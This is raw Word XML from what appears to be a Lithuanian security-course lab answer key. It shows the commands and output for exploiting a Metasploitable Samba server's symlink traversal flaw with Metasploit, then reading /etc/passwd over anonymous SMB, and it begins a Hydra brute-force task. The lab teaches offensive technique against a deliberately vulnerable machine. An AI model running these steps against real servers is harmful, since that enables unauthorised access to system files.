      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Printer Drivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DB3272" w14:textId="6AE82EE5" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Disk</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Mūsų tikslas!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FC09F5" w14:textId="2BCE53E0" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>opt</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Disk</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF0C142" w14:textId="7F2C326C" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>IPC$</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>IPC</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2132B68D" w14:textId="132685D0" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>ADMIN$</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>IPC</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D74E4" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojame metasploit, susikuriame „Sharename“:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211A278C" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>root@kali:~#</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036BDBBD" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>msf &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> search SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD985C6" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>msf &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> use auxiliary/admin/smb/samba_symlink_traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EDEBE6" w14:textId="32DB8095" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">auxiliary(samba_symlink_traversal) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set RHOST 192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7FB0C5" w14:textId="2A1D44AD" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">auxiliary(samba_symlink_traversal) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set SMBSHARE tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD43B8" w14:textId="1D37D882" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">auxiliary(samba_symlink_traversal) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570BAEA0" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">msf auxiliary(samba_symlink_traversal) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD02900" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jungiamės SMB klientu į serverį, „tmp“ katalogą</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C1BD0B" w14:textId="3E536220" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">root@kali:~# </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smbclient -L //192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7E12E1" w14:textId="2DBD540C" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>root@kali:~#</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> smbclient //192.168.160.131/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA7314F" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Anonymous login successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1B68EF" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146B404C" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Gauname sistemos vartotojų sąrašą:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718E5788" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">smb: \&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cd rootfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC0F7E2" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">smb: \rootfs\&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cd etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F2A67F" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">smb: \rootfs\etc\&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>more passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EA0053" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401B2DBE" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB6B7B3" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>daemon:x:1:1:daemon:/usr/sbin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B23A87" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:lastRenderedPageBreak/>
        <w:t>bin:x:2:2:bin:/bin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717C011E" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>[..]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77157C09" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496D952B" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">18 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SILPNI SLAPTAŽODŽIAI. JĖGOS BŪDAS SLAPTAŽODŽIAMS ATSPĖTI. UŽDUOTIS „PAŽEIDŽIAMUMŲ IŠNAUDOJIMAS“ (atlikti būtina).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E6F94D" w14:textId="77777777" w:rsidR="00AE1A9B" w:rsidRPr="005A5C28" w:rsidRDefault="00AE1A9B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42FD198F" w14:textId="24D79338" w:rsidR="00C77190" w:rsidRPr="005A5C28" w:rsidRDefault="00C77190"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ATSAKYMAS</w:t>
      </w:r>
      <w:r w:rsidR="001A2230" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="001A2230" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187CFEE2" w14:textId="3D4A0CFA" w:rsidR="00C77190" w:rsidRPr="005A5C28" w:rsidRDefault="77D3798B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="235D4F9C" wp14:editId="40C0FB1F">
            <wp:extent cx="6299836" cy="3408680"/>
            <wp:effectExtent l="0" t="0" r="5715" b="127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pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId262">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="3408680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F213CE" w14:textId="1AFAA2D4" w:rsidR="00C77190" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00C77190" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. pav. Hydra naudojimosi instrukcija</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEEA5E5" w14:textId="77777777" w:rsidR="00C77190" w:rsidRPr="005A5C28" w:rsidRDefault="00C77190"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5CE0A64A" w14:textId="77777777" w:rsidR="00C77190" w:rsidRPr="005A5C28" w:rsidRDefault="00C77190" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29DCE8CA" w14:textId="417AD963" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="48F4E16E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DCD532B" wp14:editId="0351EE00">
            <wp:extent cx="6299836" cy="817245"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1905"/>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pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
